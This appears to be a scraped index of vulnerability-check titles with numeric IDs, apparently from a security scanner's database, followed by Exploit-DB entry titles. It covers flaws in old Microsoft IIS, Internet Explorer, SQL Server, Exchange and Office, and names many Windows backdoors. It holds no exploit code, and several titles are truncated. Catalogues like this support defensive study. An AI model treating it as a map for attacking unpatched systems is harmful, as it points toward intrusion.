Commerce Server 2000 AuthFilter ISAPI filter buffer overflow [8252] Microsoft Internet Explorer VBScript can be used to view local files [8243] Microsoft SQL Server OLE DB provider name &quot [8242] Microsoft Visual C++.Net and Visual C++ insecure buffer overflow protection [8218] Microsoft Internet Explorer Content-Type header cross-site scripting [8198] Microsoft Outlook Express &lt [8191] Microsoft IIS 5.1 specially-crafted .cnf file request could reveal file contents [8174] Microsoft IIS 5.1 .cnf file request could reveal sensitive information [8120] Microsoft Internet Explorer could allow an attacker to execute script despite disabled scripting [8118] Microsoft Internet Explorer could be used to open a program on a remote system [8117] Microsoft Internet Explorer could misrepresent file names in the file download dialog box [8116] Microsoft Internet Explorer HTML &quot [8092] Microsoft Exchange 2000 System Attendant sets incorrect registry permissions [8087] Microsoft Office v. X for Mac OS X PID Checker denial of service [8080] Microsoft Site Server sample sites allow SQL injection [8073] Microsoft Site Server LDAP_Anonymous user account generates weak passwords [8071] Microsoft Site Server ASP files reveals sensitive information [8069] Microsoft Site Server POST command directory traversal [8056] Microsoft IIS is running on the system [8053] Microsoft Site Server &quot [8051] Microsoft Site Server stores LDAP member passwords in plain text [8050] Microsoft Site Server default ASP pages allow cross-site scripting [8048] Microsoft Site Server LDAP_Anonymous default account and password [8036] ILOVEYOU or Love Letter worm uses Microsoft Outlook and mIRC to propagate and attack systems [7969] Microsoft Internet Explorer for Mac OS could allow execution of files [7954] BadBlue uploaded Microsoft Office document macro execution [7947] BadBlue Microsoft Office file viewing script non-existent file request denial of service [7946] BadBlue Microsoft Office file viewing script &quot [7941] Microsoft Internet Explorer CODEBASE value allows remote program execution [7938] Microsoft Internet Explorer HTML form denial of service [7919] Microsoft IIS 4.0 and Norton Internet Security 2001 default permissions could allow an attacker to modify log files [7906] Microsoft Internet Explorer clipboardData object allows a remote attacker to view clipboard information [7900] Microsoft Outlook PGP plug-in saves a decrypted copy of encrypted emails [7885] BioNet backdoor for Windows [7826] Microsoft Internet Explorer showModelessDialog() denial of service [7815] Apache for Windows &quot [7795] Microsoft FrontPage Server Extensions (FPSE) &quot [7788] Microsoft FrontPage Server Extensions (FPSE) &quot [7784] Microsoft Internet Explorer JavaScript OnError allows a remote attacker to determine a file`s existence [7758] Microsoft Internet Explorer GetObject directory traversal allows an attacker to read files [7737] Microsoft Internet Explorer &quot [7725] Microsoft SQL Server C runtime format string attack [7724] Microsoft SQL Server text message query buffer overflow [7712] Microsoft Internet Explorer XMLHTTP redirect reveals contents of file [7703] Microsoft Internet Explorer could allow automatic file download and execution [7702] Microsoft Internet Explorer &quot [7691] Microsoft IIS HTTP GET request with false &quot [7670] Microsoft Outlook Express allows blocked attachments to be opened when the message is forwarded [7663] Microsoft Exchange 5.5 OWA HTML email body embedded script execution [7661] Microsoft Internet Explorer settimeout function in JavaScript can cause the program to crash [7648] Microsoft Outlook Express for Macintosh long message line buffer overflow [7640] Microsoft IIS is present on the system [7636] Microsoft Internet Explorer could allow an attacker to spoof the file extension of a downloadable file [7613] Microsoft IIS allows attackers to create fake log entries [7610] CBlade worm infects Microsoft SQL Servers [7592] Microsoft Internet Explorer allows an attacker to determine password characters [7581] Microsoft Internet Explorer HTTP_USER_AGENT could allow attacker to determine the existence of patch Q312461 [7566] Microsoft IIS 2.0 and 3.0 upgraded to Microsoft IIS 4.0 fails to remove the ism.dll file [7563] Microsoft Zero Administration Kit (ZAK) could allow an attacker to bypass file restrictions [7559] Microsoft Index Server installed with IIS 4.0 could allow a local attacker to obtain physical path information [7558] Microsoft IIS FileSystemObject in showfile.asp could allow remote attackers to read arbitrary files [7545] Microsoft Internet Explorer installation wizard (ie5setup.exe) disables screen saver password and task scheduler [7527] Microsoft SQL Server malformed RPC request denial of service [7526] Microsoft Exchange Server malformed RPC request denial of service [7497] Microsoft Internet Explorer remote file enumeration [7486] Microsoft Internet Explorer &quot [7446] Microsoft ISA Server fragmented UDP packet flood denial of service [7426] Microsoft Internet Explorer may expose authentication information to redirected Web sites [7425] OpenVMS and DECwindows Motif Server allows unauthorized access [7407] Macintosh clients using Windows 2000 NTFS volumes can modify directory permissions [7354] Microsoft SQL Server 6.5 stores the SQLExecutiveCmdExec in registry using weak encryption algorithm [7336] Microsoft Internet Explorer for Mac OS X could allow the automatic execution of downloaded files [7313] Microsoft Internet Explorer allows JavaScript to spoof dialog boxes [7260] Microsoft Internet Explorer command execution with Telnet client in SFU [7259] Microsoft Internet Explorer URL can contain encoded HTTP requests to third-party site [7258] Microsoft Internet Explorer dotless IP could allow rendering of Web sites with incorrect Security Zone [7223] Microsoft Excel and PowerPoint malformed document macro execution [7202] Microsoft IIS 4.0/5.0 escaped percent found [7201] Microsoft IIS 4.0/5.0 malformed double percent sequence [7199] Microsoft IIS 4.0/5.0 malformed hex sequence [7188] Norton Utilities for Windows 95 &quot [7168] Microsoft Exchange OWA deeply-nested folder request denial of service [7118] Microsoft Outlook Express &quot [7093] Norton AntiVirus for Microsoft Exchange could reveal sensitive information to attackers [7089] Microsoft Exchange OWA could allow search of global address list [7052] Microsoft Outlook Express 6 file attachment security feature bypass [7039] Microsoft Exchange OWA denial of service [6995] Microsoft IIS %u Unicode wide character encoding detected [6994] Microsoft IIS %u Unicode encoding detected [6991] Microsoft ISA Server cross-site scripting [6990] Microsoft ISA Server Proxy Service memory leak denial of service [6989] Microsoft ISA Server H.323 Gatekeeper Service memory leak denial of service [6985] Microsoft IIS relative path usage in system file process table could allow elevated privileges [6984] Microsoft IIS specially-crafted SSI directives buffer overflow [6983] Microsoft IIS invalid MIME header denial of service [6982] Microsoft IIS WebDAV long invalid request denial of service [6981] Microsoft IIS URL redirection denial of service [6963] Microsoft IIS HTTPS connection could reveal internal IP address [6914] Multiple Microsoft products malformed RPC request denial of service [6883] Microsoft SFU Telnet denial of service [6882] Microsoft SFU NFS denial of service [6858] Microsoft IIS cross-site scripting patch denial of service [6831] Microsoft Outlook &quot [6800] Microsoft IIS device file request can crash the ASP processor [6748] Microsoft Internet Explorer &quot [6742] Microsoft IIS reveals .asp source code with Unicode extensions [6732] Microsoft Word allows embedded macro to bypass security settings [6730] Microsoft FrontPage Server Extensions Visual Studio RAD Support sub-component buffer overflow [6705] Microsoft IIS idq.dll ISAPI extension buffer overflow [6688] Microsoft Internet Explorer could allow remote attackers to view file contents from a victim`s hard drive [6684] Microsoft SQL Server cached connections could allow an attacker to gain access to the database [6655] Microsoft Outlook and Outlook Express Address Book allows attacker to spoof emails [6652] Microsoft Exchange 2000 OWA script execution [6651] Microsoft ISA Server Web Proxy denial of service caused by embedded code in HTML email [6614] Microsoft Word .asd file macros could automatically execute [6571] Microsoft Word RTF document automatic macro execution [6556] Microsoft Internet Explorer HTML code manipulation could alter the URL displayed in the address bar [6555] Microsoft Internet Explorer with certificate CRL checking enabled could allow Web site spoofing [6549] Microsoft IIS WebDAV lock method memory leak can cause a denial of service [6545] Microsoft IIS FTP weak domain authentication [6535] Microsoft IIS FTP wildcard processing function denial of service [6534] Microsoft IIS URL decoding error could allow remote code execution [6533] PC4800 WLAN network adapter card may reveal SSID(s) in Windows registry [6528] WLLUC WLAN network adapter card may reveal WEP encryption keys and SSID in Windows registry [6527] Apache Web Server for Windows and OS2 denial of service [6526] WLRBT WLAN network adapter card may reveal WEP encryption key and SSID in Windows registry [6525] CW10 WLAN network adapter card may reveal security information in Windows registry [6485] Microsoft IIS 5.0 ISAPI Internet Printing Protocol extension buffer overflow [6448] Microsoft Internet Explorer 5.x allows active scripts using XML stylesheets [6426] Microsoft Internet Explorer altering CLSID action allows malicious file execution [6405] Microsoft Data Access Component Internet Publishing Provider allows WebDAV access [6383] Microsoft ISA Server Web Proxy denial of service [6370] ORiNOCO AS client Windows NT Remote Access Service ppp.log reveals RADIUS user credentials [6361] ORiNOCO AS client software reveals wireless network name and RADIUS user credentials in Windows registry [6306] Microsoft Internet Explorer HTML emails with incorrect MIME headers could allow execution of code [6288] Microsoft Visual Studio VB-TSQL buffer overflow [6265] Microsoft invalid digital certificates could be used for spoofing [6238] Dagger backdoor for Windows 95/98 [6230] Microsoft Internet Explorer command execution with Telnet client in SFU [6205] Microsoft IIS WebDAV denial of service [6172] Microsoft Exchange malformed URL request denial of service [6171] Microsoft IIS and Exchange malformed URL request denial of service [6150] NetDemon backdoor for Windows 95/98 [6086] Microsoft Internet Explorer &quot [6085] Microsoft Internet Explorer scriptlet rendering could allow Web site operators to read files [6029] Microsoft IIS CmdAsp could allow remote attackers to gain privileges [5938] Microsoft Internet Explorer mshtml.dll denial of service [5903] Microsoft IIS 5.0 allows the viewing of files through malformed URL [5823] Microsoft IIS Web form submission denial of service [5785] Microsoft Media Services dropped connection denial of service [5729] Microsoft IIS Far East editions file disclosure [5622] Microsoft SQL XP srv_paraminfo() buffer overflow [5615] Microsoft Internet Explorer file upload form [5614] Microsoft Internet Explorer print template [5575] Microsoft Media Player .WMS script execution [5574] Microsoft Media Player .ASX buffer overflow [5566] Microsoft Internet Explorer 5.5 index.dat file can be used to remotely execute code [5541] CrazzyNet backdoor for Windows [5537] Microsoft Exchange Server has a known username and password [5510] Microsoft Internet Information Service (IIS) ISAPI buffer overflow [5508] Microsoft Outlook client reveals physical path [5504] Microsoft Internet Explorer &quot [5500] Tini backdoor for Windows [5494] Microsoft FrontPage 98 Server Extensions fpcount.exe CGI can be remotely crashed [5470] Microsoft Internet Information Service (IIS) invalid executable filename passing [5458] Rux Tick backdoor for Windows [5441] Microsoft IIS .htw cross-site scripting [5389] Event Horizon backdoor for Windows [5377] Microsoft IIS Unicode translation error allows remote command execution [5367] Microsoft Internet Explorer cached info [5362] Remote Storm backdoor for Windows [5356] Snid X2 backdoor for Windows [5335] Microsoft IIS Index Server directory traversal [5329] Host Control backdoor for Windows [5328] GayOL backdoor for Windows and AOL [5324] TransScout backdoor for Windows [5322] Microsoft Word Mail Merge [5304] Chupacabra backdoor for Windows [5293] Microsoft Internet Explorer exposes users files [5263] Microsoft Office 2000 executes .dll without users knowledge [5202] Microsoft IIS invalid URL allows attackers to crash service [5175] Microsoft Outlook and Outlook Express vCards buffer overflow [5156] Microsoft IIS Cross-Site Scripting [5147] Microsoft Money plain-text password [5127] Microsoft Virtual Machine java applet allows malicious Web site to masquerade as visitor [5124] Microsoft FrontPage Server Extensions device name denial of service [5106] Microsoft IIS 4.0 discloses internal IP addresses [5104] Microsoft IIS allows remote attackers to obtain source code fragments using +.htr [5086] Qaz backdoor for Windows [5080] Microsoft Office 2000 HTML object tag buffer overflow [5075] Microsoft Internet Explorer &quot [5071] Microsoft IIS canonicalization error applies incorrect permissions to certain types of files [5025] Infector backdoor for Windows [5016] Microsoft Excel register.id function [5013] Microsoft Outlook and Outlook Express cache bypass [4960] Microsoft IIS on Win2kPro security button restriction [4953] Microsoft Outlook date header buffer overflow [4951] Microsoft IIS absent directory browser argument [4933] Microsoft SQL Enterprise Manager password disclosure [4899] Microsoft FrontPage Extensions shtml.dll multiple access denial of service [4893] Microsoft mail clients denial of service [4883] Service ticket granted to a Windows 2000 security principal [4864] Authentication ticket granted to a Windows 2000 security principal [4863] Security identifier failed to be written to Windows 2000 security principal sIDHistory [4862] Security identifier added to Windows 2000 security principal sIDHistory [4849] Asylum RAT (Remote Access Tool) backdoor for Windows [4848] Connection backdoor for Windows 95/98 [4845] SniperNet backdoor for Windows 95/98 [4842] Microsoft Internet Explorer and Microsoft Powerpoint 2000 ActiveX object execution [4841] Microsoft Internet Explorer and Microsoft Access 2000 VBA code execution [4814] Syphillis backdoor for Windows 95/98 [4790] Microsoft IIS \mailroot\pickup directory denial of service [4789] Swift Remote backdoor for Windows 95/98 [4757] Microsoft IIS server-side includes (SSI) #exec directive [4710] Norton AntiVirus for Microsoft Exchange unzip buffer overflow [4709] Norton AntiVirus for Microsoft Exchange may enter &quot [4679] Microsoft DNS Server - Name offset exceeding DNS message packet length [4678] Microsoft DNS Server using a large amount of memory [4677] Microsoft DNS Server - Invalid DNS UPDATE message in DNS packet [4676] Microsoft DNS Server - excessive bad packets received [4675] Microsoft DNS Server - Invalid domain name offset in DNS message packet [4672] Logon attempt failure reported by Windows Service Control Manager [4663] Microsoft DNS Server - Invalid domain name [4654] Microsoft DNS Server - Invalid domain name in DNS message packet [4637] Microsoft DNS Server - Domain name exceeding maximum packet length [4635] Microsoft DNS Server - CNAME loop during caching [4627] Microsoft Internet Explorer fails to revalidate certificates within the same session [4624] Microsoft Internet Explorer fails to validate certificates in images or frames [4601] Microsoft Internet Explorer HTML Help file code execution [4582] Microsoft SQL Server DTS package reveals passwords [4569] NetOp bypasses Windows NT security to retrieve files [4558] Microsoft IIS is installed on a domain controller [4500] Microsoft Internet Explorer frame domain verification [4496] Y3K RAT backdoor for Windows [4484] Microsoft FrontPage Server Extensions image mapping components allow remote code execution [4456] Microsoft Internet Explorer external.NavigateAndFind function bypasses cross-frame security [4448] Microsoft IIS ISM.DLL could allow users to read file contents [4447] Microsoft Internet Explorer bug allows Web page operator to view cookie [4446] Microsoft Outlook Express filename overflow could allow attacker to execute files [4445] Microsoft Office UA Control malicious Web operator [4439] Microsoft FrontPage Server Extensions&quot [4430] Microsoft IIS malformed URL extension data denial of service [4399] Microsoft Commercial Internet System (MCIS) Mail server IMAP buffer overflow [4397] NetBIOS requests with a NULL source address can cause Windows 9x to become unstable [4392] Microsoft IIS could reveal source code of ASP files in some virtual directories [4339] Glacier backdoor for Windows [4333] Microsoft FrontPage 98 Server Extensions DVWSSR.DLL file buffer overflow [4302] Microsoft IIS malformed AuthChangUrl request can cause the server to stop servicing requests [4280] Microsoft DNS resolver may accept responses from non-queried hosts [4279] Microsoft IIS escape characters denial of service [4268] Microsoft FrontPage 98 Server Extensions DVWSSR.DLL file could allow remote ASP source retrieval [4232] Microsoft Index Server idq.dll allows remote directory traversal [4227] Microsoft Index Server webhits.dll reveals source of ASP files [4224] Microsoft Excel XLM macros do not generate warning messages [4204] Microsoft IIS virtual UNC share source read [4183] Microsoft IIS could disclose path of network shares [4165] NetSpy 1.2 backdoor for Windows [4152] Microsoft Outlook allows users to manipulate hidden drives [4150] Telecommando backdoor for Windows 95/98 [4149] Satans Backdoor for Windows [4148] Donald Dick backdoor for Windows [4146] Master`s Paradise98 backdoor for Windows [4145] NCX backdoor for Windows [4144] Devil backdoor for Windows [4117] Microsoft IIS chunked encoding post or put denial of service [4110] Microsoft SQL Server remote query abuse [4109] Microsoft Clip Art Gallery CIL file buffer overflow [4105] Sockets de Troie (Socket23) backdoor for Windows [4061] Funtime Apocalypse denial of service tool for Windows [3996] Microsoft Internet Explorer image source redirect [3986] Microsoft IIS ASP could be used to gain sensitive information [3959] Microsoft Direct Access Object (DAO) or JET method denial of service [3892] Microsoft IIS Long URL with excessive forward slashes passed to ASP causes an access violation [3890] Microsoft Index Server error could reveal sensitive path information [3854] Microsoft Office 2000 security setting [3837] Microsoft Internet Explorer Suite 4 HTML buffer overflow [3803] Microsoft Internet Explorer directshow filter (MSDXM.OCX) buffer overflow [3722] A Windows NT user can use SUBST to map a drive letter to a folder [3675] Microsoft DNS server cache pollution can occur if DNS spoofing has been encountered [3668] Microsoft Internet Explorer Cross Frame could be used to view files on client computers [3666] Microsoft Internet Explorer Web Proxy Auto-Discovery could allow clients to accept untrusted proxy setting information [3558] Print Operators group in Windows 2000 contains a suspicious member who might not be authorized [3468] Driver Signing check in Windows 2000 may be disabled to allow non-signed driver to be installed [3443] Domain Administrator group in Windows 2000 contains a suspicious member who might not be authorized [3393] Microsoft FrontPage Extensions authors.pwd file could reveal encrypted passwords [3391] Microsoft FrontPage Extensions service.pwd file could reveal encrypted passwords [3378] Microsoft Virtual Machine could allow a malicious Java applet to bypass security restrictions [3371] Microsoft Excel imports and runs Lotus 1-2-3 or Quattro Pro macros without warning [3326] Total Eclypse backdoor FTP server for Windows [3311] Microsoft Internet Explorer registration wizard ActiveX buffer overflow [3306] Microsoft IIS could allow remote access to servers marked as Restrict Access [3268] Microsoft Internet Explorer uses weak encryption [3246] Microsoft HTML table form Denial of Service [3244] Microsoft Scriptlet.typelib and Eyedog ActiveX controls are unsafe [3222] BackConstruction backdoor for Windows [3221] Microsoft SQL Server 6.5 non-trusted connection successful [3220] Microsoft SQL 6.5 Server shutdown [3219] Microsoft SQL Server 6.5 started [3218] Microsoft SQL Server failed connection [3217] Microsoft SQL Server non-trusted connection successful [3216] Microsoft SQL Server shutdown [3215] Microsoft SQL Server started [3214] Microsoft SQL Server trusted connection successful [3201] Microsoft SQL Server login failed - user not trusted [3200] Microsoft SQL Server login failed - user not Administrator [3199] Microsoft SQL Server login failed - invalid user [3198] Microsoft SQL Server login failed - too many users [3197] Microsoft SQL Server login failed [3196] Microsoft LDAP server blacklist failed [3195] Microsoft LDAP server permanent blacklist [3194] Microsoft LDAP server temporary blacklist [3162] BigGluck backdoor for Windows [3161] Ultors backdoor for Windows [3156] Microsoft Jet Text I-ISAM allows users to alter system files [3155] Microsoft Jet VBA shell execution [3151] StealthSpy backdoor for Windows [3150] ServeMe backdoor for Windows 95/98 [3149] The Unexplained 1.0 backdoor for Windows 95/98 and Windows NT [3148] SecretService backdoor for Windows 95/98 [3147] Truva 1.2 backdoor for Windows 95/98 [3143] RWS backdoor for Windows [3131] AOL Admin backdoor for Windows and AOL [3130] Doly backdoor for Windows [3122] Deltasource backdoor for Windows [3120] The Thing backdoor for Windows [3119] Progenic backdoor for Windows 95/98 and Windows NT [3118] Schwindler backdoor for Windows 95/98 [3117] Microsoft FrontPage long URL buffer overflow [3115] Microsoft IIS and SiteServer denial of service caused by malformed HTTP requests [3113] Hacker`s Paradise backdoor for Windows 95/98 and Windows NT [3112] Prosiak backdoor for Windows [3111] Millenium backdoor for Windows [3110] HVL-RAT backdoor for Windows and AOL [3100] Frenzy backdoor for Windows 95/98 [3099] Blazer5 backdoor for Windows 95/98 and Windows NT [2761] Microsoft Office 97 files are out of date [2686] Microsoft Outlook long file name patch not applied [2685] Microsoft Outlook Express long file name patch not applied [2675] Microsoft IIS 4.0 samples installation on Web server [2673] Microsoft IIS samples installation on Web server [2671] Microsoft IIS Passive FTP patch not applied (asp.dll out of date) [2670] Microsoft IIS Passive FTP patch not applied (wam.dll out of date) [2669] Microsoft IIS Passive FTP patch not applied (w3svc.dll out of date) [2668] Microsoft IIS Passive FTP patch not applied (infocomm.dll out of date) [2662] Microsoft IIS CGI overflow [2661] Microsoft Internet Explorer MK overrun [2444] Microsoft Internet Explorer unsigned ActiveX download [2412] Microsoft IIS account is member of Domain Users [2390] NetMonitor backdoor for Windows 95/98 and Windows NT [2389] Backdoor2 for Windows [2387] Forced Entry backdoor for Windows [2386] Coma backdoor for Windows 95/98 [2381] Microsoft IIS and SiteServer Showcode.asp sample file allows remote file viewing [2326] phAse zero backdoor for Windows 95/98 and Windows NT [2324] GirlFriend backdoor for Windows [2323] Portal of Doom backdoor for Windows [2322] GateCrasher backdoor for Windows [2321] NetSphere backdoor for Windows and ICQ [2310] EvilFTP backdoor FTP server for Windows [2302] Microsoft IIS using double-byte code pages could allow remote attackers to retrieve source code [2290] DeepThroat backdoor for Windows [2283] CMail server for Windows installs with a default administrator password [2282] Microsoft IIS bdir.htr allows remote traversal of directory structure [2281] Microsoft IIS buffer overflow in HTR requests can allow remote code execution [2252] Microsoft Jet database engine allows embedded VBA strings, which could allow execution of commands [2245] SubSeven backdoor for Windows [2244] Microsoft Internet Explorer favorites feature malicious icon file [2229] Microsoft IIS ExAir sample site denial of service [2216] Microsoft Internet Explorer crossframe vulnerability allows scripts to run in elevated context [2214] Microsoft Internet Explorer Son of Cuartango issue allows remote file retrieval [2213] Microsoft Internet Explorer Untrusted Scripted Paste issue could allow remote file retrieval [2209] Microsoft Internet Explorer treats dotless IP addresses as members of the local Intranet zone [2204] Timbuktu is a remote control server for Macintosh and Windows computer [2186] Microsoft Excel virus warning features could possibly be bypassed by malicious files [2185] Microsoft IIS and Site Server sample programs can be used to remotely view files [2173] Microsoft Internet Explorer FSO could allow remote file manipulation from a Web server [2161] Microsoft Internet Explorer DHTML edit control can be used to read arbitrary files [2142] Microsoft SQL Server allows users of remote SQL Servers to connect allowing unauthorized users of those servers access [2140] Microsoft SQL Server trojan horse found in system stored procedures [2139] Unencrypted Microsoft SQL Server triggers found [2136] Microsoft SQL Server device files should be on NTFS partitions [2134] Microsoft SQL Server backups should be performed regularly [2133] Microsoft SQL Server replication is enabled [2132] Microsoft SQL Server Trace Flags should be off [2130] Microsoft SQL Server protocols found that allow packet sniffing [2128] Microsoft SQL Server bug found that prohibits revoke permissions on certain tables [2119] Microsoft SQL Server registry extended stored procedures found that could be used to read or write to the registry [2095] Microsoft SQL Server OLE Automation extended stored procedures were found that can be used to reconfigure the security of other services [2094] Microsoft SQL Server password encryption is not enabled for all login Ids [2093] The account under which the Microsoft SQL Server service is running is not in compliance with policy [2092] Microsoft SQL Server extended stored procedure xp_sprintf buffer overflow [2077] Microsoft SQL Server extended stored procedure xp_sqlinventory can be used to crash SQL Server [2070] Microsoft Internet Explorer allows remote files to be retrieved by a malicious user [2069] Microsoft Internet Explorer can allow malicious pages to spoof legitimate, trusted sites [2036] Microsoft PWS could be exploited to remotely read arbitrary files [1969] Microsoft Exchange LDAP denial of service [1823] Microsoft IIS long GET request denial of service [1822] ARCserver Windows NT backup agents use very weak encryption for passwords [1803] Unencrypted Microsoft SQL Server stored procedures found [1780] Microsoft Office 98 documents may be saved with sensitive information [1774] Microsoft Access databases use weak passwords [1770] Microsoft SQL Server SQLMail allows logins to send email [1769] Latest Microsoft SQL Server Service Packs are not installed [1764] Latest Windows NT Service Pack is not installed [1762] Microsoft SQL Server permissions on extended stored procedures found that are not in compliance with policy [1761] Microsoft SQL Server is configured to execute stored procedures at startup that could be used as backdoors [1760] Microsoft SQL Server statement permissions found that are granted to users other than dbo [1759] Microsoft SQL Server objects not owned by database owner [1757] Microsoft SQL Server allows direct system table updates to be denied [1750] Microsoft SQL Server logins during unauthorized hours found [1749] Microsoft SQL Server permissions on system tables found granted to public [1737] Microsoft Excel CALL function can execute programs without user warning [1735] Microsoft IIS with Visual InterDev no authentication [1715] Microsoft SQL Server object permissions granted to groups are non-compliant with policy [1714] Microsoft SQL Server user permissions found that are not in compliance with policy [1713] Microsoft SQL Server Enterprise Manager leaves traces of unencrypted sa password in registry when changing authentication mode of a registered server [1712] Microsoft SQL Server Enterprise Manager leaves traces of previous unencrypted sa passwords in registry [1711] Microsoft SQL Server Enterprise Manager stores unencrypted sa password in registry [1710] Microsoft SQL Server integrated logins found and should be reviewed [1709] Microsoft SQL Server guest user IDs found [1708] Microsoft SQL Server stale logins found [1705] Microsoft SQL Server orphaned user IDs found that could result in unauthorized permissions being granted [1704] Microsoft SQL Server mismatched user IDs could result in granting of unauthorized permissions [1703] Microsoft SQL Server can be configured to audit failed or successful logins [1702] Microsoft SQL Server can be configured for different authentication methods [1701] Microsoft SQL Server set to view NT username, not hostname when viewing current users [1700] Microsoft SQL Server guest login found [1697] Microsoft SQL Server allows easily-guessed passwords [1675] Microsoft Internet Explorer 4.0 connection-reuse problem [1656] Microsoft IIS 4.0 allows user to avoid HTTP request logging [1654] Microsoft IIS remote FTP buffer overflow [1652] Quakenbush Password Appraiser publishes Windows NT user passwords to the Internet [1638] Microsoft IIS crashes processing some GET commands [1530] Microsoft IIS 3.0 newdsn.exe sample application allows remote creation of arbitrary files [1459] Blank sa password on Microsoft SQL Server [1458] Blank probe password found on Microsoft SQL Server [1457] Microsoft SQL server detection (TCP) [1451] Microsoft SQL Server detection (named pipes) [1422] CSM Proxy 4.1 remote buffer overflow crashes proxy and underlying Windows NT system [1383] Microsoft TCP/IP allows an attacker to reset connections [1376] Microsoft Proxy 2.0 denial of service [1368] Microsoft IIS 4.0 allows file execution in the Web site directory [1354] Windows NT Domain Administrators group includes non-default user [1273] Microsoft IIS special characters allowed in shell [1272] Microsoft IIS CGI scripts run as system [1271] Microsoft IIS version 2 installed [1270] Microsoft IIS incorrect permissions on restricted item [1269] Microsoft IIS incorrect Web permissions [1268] Microsoft IIS SSI #exec enabled [1228] NetBus trojan horse for Windows [1226] Microsoft DNS Server - DNS Zone Transfers from high ports [1223] Microsoft Exchange Server SMTP and NNTP denial of service [1216] Microsoft IIS SSL patch not applied [1215] Microsoft IIS Passive FTP patch not applied [1212] Microsoft IIS unauthorized ODBC data access with RDS [1211] Remote DeskLink for Windows 95 is installed [1125] Microsoft IIS ASP DATA issue could reveal source code [949] Microsoft IIS server script debugging enabled [948] Microsoft IIS samples installed on Web server [943] Microsoft Office installed on Web server [936] Microsoft IIS NTFS insecure permissions [935] Microsoft IIS executable paths [917] Microsoft Internet Explorer MK overrun [916] Microsoft Internet Explorer Embed issue [910] Microsoft Office 97 files are out of date [908] Microsoft FrontPage extensions under Unix create world readable password files [621] Microsoft IIS 3.0 script source revealed by appending 2E to requests [587] Microsoft Internet Explorer Freiburg text viewing issue [562] Microsoft Office file manager allows users to see files without access [561] Microsoft FrontPage 1.1 allows users to write to executable directories [533] Program exists to replace a password on a Windows NT computer [527] L0phtCrack 1.5 can crack Windows NT passwords [470] Microsoft Excel passwords are easily cracked [463] Microsoft Internet Explorer 3.0 allows remote command execution [462] Microsoft Internet Explorer 3.0.1 .ISP script file execution [459] Microsoft Internet Explorer divulges sensitive information in response to NTLM requests [456] Microsoft Internet Explorer and Netscape Java applets can open network connections to a server [397] Microsoft cd .. Bug [387] SMB NetBIOS Test: Possible Windows NT dotdot denial of service [385] Microsoft Internet Explorer has the check security certificate before sending option disabled [362] Microsoft Internet Explorer entering/leaving a secure site warning disabled [361] Microsoft Internet Explorer is outdated [360] Microsoft Internet Explorer non-secure form submission warning is disabled [359] Microsoft Internet Explorer has Java enabled [358] Microsoft Internet Explorer Form redirection enabled [357] Microsoft Internet Explorer has check security certificate before viewing option disabled [356] Microsoft Internet Explorer allows secure content to be cached [355] Microsoft Internet Explorer allows ActiveX controls to be automatically executed [354] Microsoft Internet Explorer active scripting is enabled [353] Microsoft Internet Explorer allows active content to be automatically downloaded [352] Microsoft Internet Explorer has low active content security [351] Microsoft Internet Explorer accept cookies warning disabled [336] Microsoft IIS ASP dot bug [295] WebSite 1.1 for Windows NT winsample buffer overflow [256] Microsoft IIS can be remotely crashed by excessively long client requests [185] Unknown Windows service [7] Microsoft IIS ASP source visible Exploit-DB - https://www.exploit-db.com: [30825] Microsoft Windows Media Digital Rights Management ActiveX Control Buffer Overflow Vulnerability [30645] Microsoft Windows URI Handler Command Execution Vulnerability [30636] Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (2) [30635] Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (1) [30619] Microsoft Windows Explorer PNG Image - Local Denial Of Service Vulnerability [30462] Microsoft Windows Media Player 11 - AU Divide-By-Zero Denial of Service Vulnerability [30392] Microsoft Windows ndproxy.sys - Local Privilege Escalation [30160] Microsoft Windows XP - GDI+ ICO File Remote Denial of Service Vulnerability [29813] Microsoft Windows Vista ARP Table Entries Denial of Service Vulnerability [29771] Microsoft Windows Vista Windows Mail Local File Execution Vulnerability [29738] Microsoft Windows XP/2000 WinMM.DLL - WAV Files Remote Denial of Service (DoS) Vulnerability [29659] Microsoft Windows XP/2003 Explorer WMF File Handling Denial of Service Vulnerability [29630] Microsoft Windows 2003/XP ReadDirectoryChangesW Information Disclosure Vulnerability [29286] Microsoft Windows Explorer explorer.exe WMV File Handling DoS [29285] Microsoft Windows Media 6.4/10.0 - MID Malformed Header Chunk DoS [28834] Microsoft Windows XP CMD.EXE Buffer Overflow Vulnerability [28482] MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution [28420] Microsoft Windows 2000 Multiple COM Object Instantiation Code Execution Vulnerabilities [28381] microsoft windows xp/2000/2003 help Multiple Vulnerabilities [28357] Microsoft Windows Explorer 2000/2003/XP Drag and Drop Remote Code Execution Vulnerability [28299] Microsoft Windows XP/2000/2003 Graphical Device Interface Plus Library Denial of Service Vulnerability [28263] Microsoft Windows XP/2000/2003 Remote Denial of Service Vulnerability [28227] Microsoft Windows 2000/XP Registry Access Local Denial of Service Vulnerability [27930] Microsoft Windows XP/2000/2003 MHTML URI Buffer Overflow Vulnerability [27851] Microsoft Windows - Path Conversion Weakness [27051] Microsoft Windows Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities [26690] Microsoft Windows 2000/2003/XP CreateRemoteThread Local Denial of Service Vulnerability [26341] Microsoft Windows 2000/2003/XP MSDTC TIP Denial of Service Vulnerability [26323] Microsoft Windows XP Wireless Zero Configuration Service Information Disclosure Vulnerability [26222] Microsoft Windows 2000/2003/XP Keyboard Event Privilege Escalation Weakness [25737] Microsoft Windows 98SE User32.DLL Icon Handling Denial of Service Vulnerability [25454] Microsoft Windows 98/2000 Explorer Preview Pane Script Injection Vulnerability [25384] Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution Vulnerability (2) [25383] Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution Vulnerability (1) [25268] Microsoft Windows XP TSShutdn.exe Remote Denial of Service Vulnerability [25259] Microsoft Windows XP Local Denial of Service Vulnerability [25231] Microsoft Windows 2000/2003/XP Graphical Device Interface Library Denial of Service Vulnerability [25050] Microsoft Windows 2000/2003/XP winhlp32 Phrase Heap Overflow Vulnerability [25049] Microsoft Windows 2000/2003/XP winhlp32 Phrase Integer Overflow Vulnerability [24699] Microsoft Windows XP WAV File Handler Denial of Service Vulnerability [24682] Microsoft Windows XP Weak Default Configuration Vulnerability [24605] Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability [24277] Microsoft Windows 2000/NT 4 POSIX Subsystem Buffer Overflow Local Privilege Escalation Vulnerability [24173] PHP 4.3.x Microsoft Windows Shell Escape Functions Command Execution Vulnerability [24125] 